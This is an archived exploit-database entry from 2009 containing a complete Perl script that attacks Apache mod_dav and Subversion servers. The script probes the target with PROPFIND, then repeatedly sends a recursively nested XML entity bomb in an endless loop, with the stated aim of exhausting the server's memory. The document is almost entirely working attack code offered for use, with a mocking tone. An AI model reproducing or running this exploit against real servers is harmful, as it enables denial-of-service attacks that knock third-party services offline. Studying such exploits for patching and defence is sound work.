Apoche mod_dav Denial Of Service

2009-06-03T00:00:00
ID PACKETSTORM:77992
Type packetstorm
Reporter Kingcope
Modified 2009-06-03T00:00:00

Description

                                        
                                            `###furoffyourcat.pl  
### Apache mod_dav / svn Remote Denial of Service Exploit  
### by kcope / June 2009  
###  
### Will exhaust all system memory  
### Needs Authentication on normal DAV  
###  
### This can be especially serious stuff when used against  
### svn (subversion) servers!! Svn might let the PROPFIND slip through  
### without authentication. bwhahaaha :o)  
### use at your own risk!  
##################################################################  
  
use IO::Socket;  
use MIME::Base64;  
  
sub usage {  
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";  
print "by kcope in 2009\n";  
print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";  
print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;  
}  
  
if ($#ARGV < 1) {usage();}  
  
$hostname = $ARGV[0];  
$webdavfile = $ARGV[1];  
  
$username = $ARGV[2];  
$password = $ARGV[3];  
  
$|=1;  
  
$BasicAuth = encode_base64("$username:$password");  
chomp $BasicAuth;  
  
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,  
PeerPort => 80,  
Proto => 'tcp');  
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";  
print $sock "Host: $hostname\r\n";  
print $sock "Depth: 0\r\n";  
print $sock "Connection: close\r\n";  
if ($username ne "") {  
print $sock "Authorization: Basic $BasicAuth\r\n";   
}  
print $sock "\r\n";  
$x = <$sock>;   
  
print $x;  
if (!($x =~ /207/)) {  
while(<$sock>) {  
print;   
}  
close($sock);  
print "No PROPFIND on this server and path.\n";  
exit(0);   
}  
  
$a = "";  
for ($i=1;$i<256;$i++) { # Here you can increase the XML bomb count  
$k = $i-1;  
$a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"  
}  
  
$igzml =   
"<?xml version=\"1.0\"?>\n"  
."<!DOCTYPE REMOTE [\n"  
."<!ELEMENT REMOTE ANY>\n"  
."<!ENTITY x0 \"foobar\">\n"  
.$a  
."]>\n"  
."<REMOTE>\n"  
."&x$k;\n"  
."</REMOTE>\n";  
  
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";  
print "by kcope in 2009\n";  
print "Launching DoS Attack...\n";  
  
$ExploitRequest =  
"PROPFIND $webdavfile HTTP/1.1\r\n"  
."Host: $hostname\r\n"  
."Depth: 0\r\n";  
  
if ($username ne "") {  
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";   
}  
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;  
  
while(1) {  
again:  
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,  
PeerPort => 80,  
Proto => 'tcp') || (goto again);  
  
print $sock $ExploitRequest;  
print ";Pp";  
}  
  
  
`